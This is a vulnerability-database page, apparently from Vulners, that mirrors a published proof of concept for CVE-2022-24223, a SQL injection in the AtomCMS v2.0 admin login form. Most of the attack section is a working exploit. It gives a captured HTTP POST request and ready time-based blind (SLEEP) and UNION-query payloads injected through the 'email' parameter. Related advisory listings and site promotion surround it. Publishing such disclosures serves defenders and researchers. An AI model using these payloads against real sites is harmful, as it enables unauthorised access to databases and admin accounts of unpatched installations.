Lucene search
K

Atom CMS 2.0 SQL Injection

🗓️ 09 Feb 2022 00:00:00Reported by Luca CuzzolinType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 267 Views

AtomCMS 2.0 SQL Injection CVE-2022-2422

Related
Code
ReporterTitlePublishedViews
Family
0day.today
AtomCMS v2.0 - SQL injection Vulnerability
9 Feb 202200:00
zdt
ATTACKERKB
CVE-2022-24223
1 Feb 202219:15
attackerkb
Circl
CVE-2022-24223
1 Feb 202222:26
circl
CNNVD
Atom CMS SQL注入漏洞
1 Feb 202200:00
cnnvd
Check Point Advisories
AtomCMS SQL Injection (CVE-2022-24223)
2 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-24223
1 Feb 202218:36
cve
Cvelist
CVE-2022-24223
1 Feb 202218:36
cvelist
Exploit DB
AtomCMS v2.0 - SQLi
9 Feb 202200:00
exploitdb
Nuclei
Atom CMS v2.0 - SQL Injection
7 Jun 202603:02
nuclei
NVD
CVE-2022-24223
1 Feb 202219:15
nvd
Rows per page
`# Exploit Title: AtomCMS v2.0 - SQLi  
# Date: 08/02/2022  
# Exploit Author: Luca Cuzzolin aka czz78  
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS  
# Version: v2.0  
# Category: Webapps  
# Tested on: Debian linux  
# CVE : CVE-2022-24223  
  
  
====================================================  
  
# PoC : SQLi :  
  
http://127.0.0.1/Atom.CMS/admin/login.php  
  
  
POST /Atom.CMS/admin/login.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101  
Firefox/91.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 35  
Origin: http://127.0.0.1  
Connection: keep-alive  
Referer: http://127.0.0.1/Atom.CMS/admin/login.php  
Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
email=test%40test.com&password=1234  
  
  
Vulnerable Payload :  
  
Parameter: email (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: [email protected]' AND (SELECT 5613 FROM  
(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234  
Vector: AND (SELECT [RANDNUM] FROM  
(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 6 columns  
Payload: [email protected]' UNION ALL SELECT  
NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL--  
-&password=1234  
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -  
---  
  
  
  
====================================================  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Feb 2022 00:00Current
0.4Low risk
Vulners AI Score0.4
CVSS 27.5
CVSS 3.19.8
EPSS0.20966
267